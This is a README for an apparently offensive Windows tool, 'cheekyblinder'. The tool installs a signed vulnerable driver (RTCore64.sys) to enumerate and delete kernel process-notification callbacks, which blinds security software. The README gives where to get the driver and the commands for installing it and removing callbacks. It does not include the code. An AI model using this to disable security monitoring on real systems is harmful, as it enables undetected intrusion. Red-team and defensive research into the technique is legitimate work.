Enumerating and removing kernel callbacks using signed vulnerable drivers

Accompanying blog post: https://br-sn.github.io/Removing-Kernel-Callbacks-Using-Signed-Drivers/

WARNING: running this program might cause BSODs, run at your own risk.

Vulnerable driver can be downloaded from http://download-eu2.guru3d.com/afterburner/%5BGuru3D.com%5D-MSIAfterburnerSetup462Beta2.zip

Lots of code re-used from:

• https://github.com/gentilkiwi/mimikatz/
• https://github.com/RedCursorSecurityConsulting/PPLKiller

Should build fine on VS2019, build for x64 only.

Run elevated. Arguments and examples:

cheekyblinder.exe /process: lists the current process notification callbacks present on the system

cheekyblinder.exe /delprocess <address>: removes the callback at <address> (use the address from the output of /process)

cheekyblinder.exe /installDriver: installs the driver RTCore64.sys (place in same folder)

cheekyblinder.exe /uninstallDriver: removes the driver

I'll add more callbacks when I have time.

Use the mimikatz pattern search to find the array rather than hacky offsets. PRs welcome